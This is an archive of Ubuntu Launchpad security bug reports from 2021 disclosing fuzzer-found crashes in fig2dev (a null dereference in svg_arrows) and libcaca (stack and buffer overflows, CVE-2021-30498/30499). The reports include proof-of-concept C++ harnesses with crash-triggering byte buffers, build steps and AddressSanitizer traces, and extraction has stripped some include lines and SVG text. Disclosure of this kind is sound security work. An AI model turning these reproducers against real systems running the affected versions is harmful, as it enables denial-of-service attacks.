[Touch-packages] [Bug 1926673] [NEW] Null pointer of fig2dev of gensvg.c in function svg_arrows

2021-04-29 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hi
I found an crash error.

issues: https://sourceforge.net/p/mcj/tickets/114/
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
fig2dev Version 3.2.8a

Verification steps:
1.Get the source code of fig2dev
2.Compile the fig2dev

```bash
$ cd fig2dev-3.2.8a
$ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" 
CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
$ make
```

3.run fig2dev
```bash
$ ./fig2dev -L svg fig2dev_crash
```

asan info:





http://www.w3.org/2000/svg;
xmlns:xlink="http://www.w3.org/1999/xlink;
width="73pt" height="113pt"
viewBox="-76 -376 1202 1877">





























AddressSanitizer:DEADLYSIGNAL
=
==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 
0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
==3255219==The signal is caused by a READ memory access.
==3255219==Hint: address points to the zero page.
#0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
#1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
#2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
#3 0x4d0847 in main 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
#4 0x7f5e0e4f50b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c71d in _start 
(/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24 in svg_arrows
==3255219==ABORTING

** Affects: xfig (Ubuntu)
 Importance: Undecided
 Assignee: xiao huang (shanzhuli)
 Status: New


** Tags: security

** Information type changed from Private Security to Public Security

** Summary changed:

-  fig2dev
+ Null pointer of fig2dev of gensvg.c in function svg_arrows

** Description changed:

  Hi
  I found an crash error.
  
  issues: https://sourceforge.net/p/mcj/tickets/114/
- 
+ 
commit:https://sourceforge.net/p/mcj/fig2dev/ci/43cfa693284b076e5d2cc100758a34b76db65e58/
  
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  fig2dev Version 3.2.8a
  
  Verification steps:
  1.Get the source code of fig2dev
  2.Compile the fig2dev
  
  ```bash
  $ cd fig2dev-3.2.8a
  $ ./configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address" 
CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address"
- $ make 
+ $ make
  ```
  
  3.run fig2dev
  ```bash
  $ ./fig2dev -L svg fig2dev_crash
  ```
  
  asan info:
  
  
  
  
  
  http://www.w3.org/2000/svg;
- xmlns:xlink="http://www.w3.org/1999/xlink;
- width="73pt" height="113pt"
- viewBox="-76 -376 1202 1877">
+ xmlns:xlink="http://www.w3.org/1999/xlink;
+ width="73pt" height="113pt"
+ viewBox="-76 -376 1202 1877">
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
+ stroke="#ff" stroke-width="8px"/>
  
  
  
  
  
+ x="0" y="0" width="134" height="134">
  
  
  
  
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  
+ stroke="#00" stroke-width="8px"/>
  
  
  AddressSanitizer:DEADLYSIGNAL
  =
  ==3255219==ERROR: AddressSanitizer: SEGV on unknown address 0x 
(pc 0x00583a3d bp 0x7ffec0773610 sp 0x7ffec0773590 T0)
  ==3255219==The signal is caused by a READ memory access.
  ==3255219==Hint: address points to the zero page.
- #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
- #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
- #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:1008:6
- #3 0x4d0847 in main 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev.c:485:11
- #4 0x7f5e0e4f50b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #5 0x41c71d in _start 
(/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/fig2dev+0x41c71d)
+ #0 0x583a3d in svg_arrows 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:1141:24
+ #1 0x583a3d in gensvg_line 
/home/hh/Downloads/fig2dev-3.2.8a/fig2dev/dev/gensvg.c:743:17
+ #2 0x4d0847 in gendev_objects 
/home/hh/Downloads/fig2dev-3.

[Touch-packages] [Bug 1925467] Re: stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues: https://github.com/cacalabs/libcaca/issues/55
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_ansi.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"ansi");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
- 
  int main(int args,char* argv[]){
  
- size_t  len = 0;
- unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
  
- return 0;
+ return 0;
  
  }
  4.compile poc_ansi.cc
  
  clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
  5.Run poc_ansi
  asan info:
  
  =
  ==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
  READ of size 1 at 0x7ffda0164bea thread T0
- #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
+ #0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
  
  Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
  Shadow bytes around the buggy address:
-   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
-   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
-   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
-   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
+   0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
+   0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
+   0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  =>0x100034024970: 

[Touch-packages] [Bug 1925468] Re: stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
** Description changed:

  Hello ubuntu security team
+ 
+ issues:https://github.com/cacalabs/libcaca/issues/56
+ 
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1
+ 
  
  libcaca version e4968ba
  
  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library
  
  $ cd libcaca
  $ ./bootstrap
  $ ./configure
  $ make
  or
  
  $ cd libcaca
  $ ./bootstrap
  $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
  $ make
  3.Create the poc_bin.cc && build
  
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  using namespace std;
  
  void crash(const uint8_t *Data, size_t Size) {
  
-   if(Size<8) return ;
-   size_t len=0;
-   caca_canvas_t *cv;
-   cv = caca_create_canvas(0,0);
-   caca_create_frame(cv,0);
-   caca_set_frame(cv,0);
-   caca_import_canvas_from_memory(cv,Data,Size,"bin");
-   caca_free_canvas(cv);
-   cv=NULL;
+   if(Size<8) return ;
+   size_t len=0;
+   caca_canvas_t *cv;
+   cv = caca_create_canvas(0,0);
+   caca_create_frame(cv,0);
+   caca_set_frame(cv,0);
+   caca_import_canvas_from_memory(cv,Data,Size,"bin");
+   caca_free_canvas(cv);
+   cv=NULL;
  
  }
  
  int main(int args,char* argv[]){
- size_t  len = 0;
- unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
- len = sizeof(buffer)/sizeof(unsigned char);
- printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
- crash((const uint8_t*)buffer,len);
- return 0;
+ size_t  len = 0;
+ unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
+ len = sizeof(buffer)/sizeof(unsigned char);
+ printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
+ crash((const uint8_t*)buffer,len);
+ return 0;
  
  }
  4.compile poc_bin.cc
  
  clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
  5.Run poc_bin
  asan info:
  
  =
  ==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
  READ of size 1 at 0x7ffe7cd3774d thread T0
- #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
- #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
- #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
- #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
- #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
+ #0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
+ #1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
+ #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
+ #3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
  
  Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
  
-   This frame has 1 object(s):
- [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
+   This frame has 1 object(s):
+ [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
  HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
-   (longjmp and C++ exceptions *are* supported)
+   (longjmp and C++ exceptions *are* supported)
  SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
  Shadow bytes around the buggy address:
-   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+   0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

[Touch-packages] [Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
$ make
3.Create the poc_ansi.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include 
#include 
#include 
#include 
#include 
#include 

using namespace std;

void crash(const uint8_t *Data, size_t Size) {

  if(Size<8) return ;
  size_t len=0;
  caca_canvas_t *cv;
  cv = caca_create_canvas(0,0);
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"ansi");
  caca_free_canvas(cv);
  cv=NULL;

}


int main(int args,char* argv[]){

size_t  len = 0;
unsigned char buffer[] = 
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);

return 0;

}
4.compile poc_ansi.cc

clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address  
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_ansi
5.Run poc_ansi
asan info:

=
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
#0 0x7f098d82c30f in _import_ansi 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
#1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f098d2780b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)

Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
[32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this 
variable
HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
  (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
  0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
  0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
  0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
  0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:   00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:   fa
  Freed heap region:   fd
  Stack left redzone:  f1
  Stack mid redzone:   f2
  Stack right redzone: f3
  Stack after return:  f5
  Stack use after scope:   f8
  Global redzone:  f9
  Global init order:   f6
  Poisoned by user:f7
  Container overflow:  fc
  Array cookie:ac
  Intra object redzone:bb
  ASan internal:   fe
  Left alloca redzone: ca
  Right alloca redzone:cb
  Shadow gap:  cc
==3763372==ABORTING
Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925467

Title:
  stack-buffer-overflow of text.c in function _import_ansi

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello ubuntu security team
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd libcaca
  $ 

[Touch-packages] [Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin

2021-04-22 Thread xiao huang
*** This bug is a security vulnerability ***

Public security bug reported:

Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g 
-fsanitize=address,fuzzer-no-link  -fsanitize-coverage=bb" CXX="clang++ -O2 
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link  
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include 
#include 
#include 
#include 
#include 
#include 

using namespace std;

void crash(const uint8_t *Data, size_t Size) {

  if(Size<8) return ;
  size_t len=0;
  caca_canvas_t *cv;
  cv = caca_create_canvas(0,0);
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"bin");
  caca_free_canvas(cv);
  cv=NULL;

}

int main(int args,char* argv[]){
size_t  len = 0;
unsigned char buffer[] = 
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;

}
4.compile poc_bin.cc

clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address  -I./caca/ 
-lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/  -o poc_bin
5.Run poc_bin
asan info:

=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long) 
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main 
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this 
variable
HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork
  (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow 
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
  0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
  0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:   00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:   fa
  Freed heap region:   fd
  Stack left redzone:  f1
  Stack mid redzone:   f2
  Stack right redzone: f3
  Stack after return:  f5
  Stack use after scope:   f8
  Global redzone:  f9
  Global init order:   f6
  Poisoned by user:f7
  Container overflow:  fc
  Array cookie:ac
  Intra object redzone:bb
  ASan internal:   fe
  Left alloca redzone: ca
  Right alloca redzone:cb
  Shadow gap:  cc
==3817476==ABORTING

Thanks

** Affects: libcaca (Ubuntu)
 Importance: Undecided
 Status: New

** Information type changed from Public to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1925468

Title:
  stack-buffer-overflow of import.c in function _import_bin

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello ubuntu security team
  System info:
  Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
  Fedora 33: clang 11.0.0 , gcc 10.2.1

  libcaca version e4968ba

  Verification steps:
  1.Get the source code of libcaca
  2.Compile the libcaca.so library

  $ cd 

[Touch-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff

2021-04-12 Thread xiao huang
Issues have been assigned numbers CVE-2021-30498、CVE-2021-30499

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libcaca in Ubuntu.
https://bugs.launchpad.net/bugs/1923273

Title:
  buffer-overflow on libcaca-0.99.beta20/export.c export_tga,
  export_troff

Status in libcaca package in Ubuntu:
  New

Bug description:
  Hello Ubuntu Security Team
  I use libfuzzer to test libcaca api .I found two crash

  - https://github.com/cacalabs/libcaca/issues/53

  - https://github.com/cacalabs/libcaca/issues/54

  
  ## Vendor of Product
  https://github.com/cacalabs/libcaca

  
  ## Affected Product Code Base
  libcaca e4968ba
  
  ## Affected Component
  affected component:libcaca.so
  
  ## Affected source code file
  affected source code file(As call stack):

 ->caca_export_canvas_to_memory()  in
  libcaca/caca/codec/export.c

 ->caca_export_memory()in
  libcaca/caca/codec/export.c

 -> export_tga()in  
libcaca/caca/codec/export.c

-> export_troff()   in  
libcaca/caca/codec/export.c

   
  ## Attack Type
  Context-dependent

  
  ## Impact Denial of Service
  true

  
  ## Reference
  https://github.com/cacalabs/libcaca

  
  ## Discoverer
  fdgnneig

  
  ## Verification process and POC

  ### Verification steps:

  1.Get the source code of libcaca:

  2.Compile the libcaca.so library:

  ```shell
  $ cd libcaca
  $ apt-get install automake libtool pkg-config -y
  $ ./bootstrap
  $ ./configure
  $ make

  3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc

  4.Run POC

  
  POC.sh
  ```
  cat << EOF > poc_troff.cc
  #include "config.h"
  #include "caca.h"
  //#include "common-image.h"
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 

  using namespace std;

  extern "C"  int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t
  Size) {

   if(Size<8) return 0;
   size_t len=0;
   char* buffer = (char*)malloc(Size+1);
   memset(buffer,0,Size);
   memcpy(buffer,Data,Size);
   buffer[Size]='\0';
   caca_canvas_t *cv;
   cv = caca_create_canvas(0,0);
   for(int i=0;i<4;i++)
 caca_create_frame(cv,0);
   for(int i=0;i<4;i++){
 caca_set_frame(cv,i);
 caca_import_canvas_from_memory(cv,buffer,strlen(buffer),"");
   }
   void* reData = caca_export_canvas_to_memory(cv,"troff",);
   if(reData!=NULL) free(reData);
   caca_free_canvas(cv);
   cv=NULL;
   free(buffer);
   buffer=NULL;

  }

  
  int main(int args,char* argv[]){

 size_t  len = 0;
 unsigned char buffer[] = 
